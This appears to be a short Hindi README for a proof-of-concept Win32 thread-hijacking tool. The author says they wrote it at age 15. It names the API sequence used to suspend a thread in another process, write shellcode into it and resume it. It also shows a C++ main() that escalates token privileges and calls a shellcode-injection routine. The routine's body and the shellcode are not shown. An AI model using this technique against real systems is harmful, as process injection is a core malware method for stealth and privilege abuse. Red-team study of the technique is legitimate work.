
PoC थ्रेड निष्पादन अपहरण (Thread Execution Hijacking) Win32 कोड इंजेक्शन के लिए
यह प्रोग्राम थ्रेड हाइजैकिंग का उपयोग करके एक मानक Win32 एप्लिकेशन में नेटिव शेलकोड इंजेक्ट करता है। जब मैंने इसे बनाया तब मैं 15 साल का था - कृपया घटिया कोड को नज़रअंदाज़ करें।
मैंने इस छोटे प्रोजेक्ट को कोड इंजेक्शन के विभिन्न तरीकों के अपने अनुभवों को आगे बढ़ाने और RedTeam सुरक्षा पेशेवरों को सॉफ्टवेयर पेनिट्रेशन टेस्टिंग करने के एक अनूठे तरीके के रूप में इस विधि का उपयोग करने की अनुमति देने के लिए विकसित किया। थ्रेड हाइजैकिंग के साथ, यह hijacker.exe प्रोग्राम को target.exe प्रोग्राम के भीतर एक थ्रेड को सस्पेंड करने की अनुमति देता है, जिससे हम उस लक्ष्य थ्रेड में शेलकोड लिख सकते हैं, और बाद में इसे निष्पादित कर सकते हैं (via; WriteProcessMemory(), SetThreadContext(), ResumeThread(), CreateThread())।

int main()
{
System sys;
Interceptor incp;
Exception exp;
sys.returnVersionState();
if (sys.returnPrivilegeEscalationState())
{
std::cout << "Token Privileges Adjusted\n";
}
if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
{
incp.ExecuteWin32Shellcode(m_procId);
}
system("PAUSE");
return 0;
}
https://capec.mitre.org/data/definitions/30.html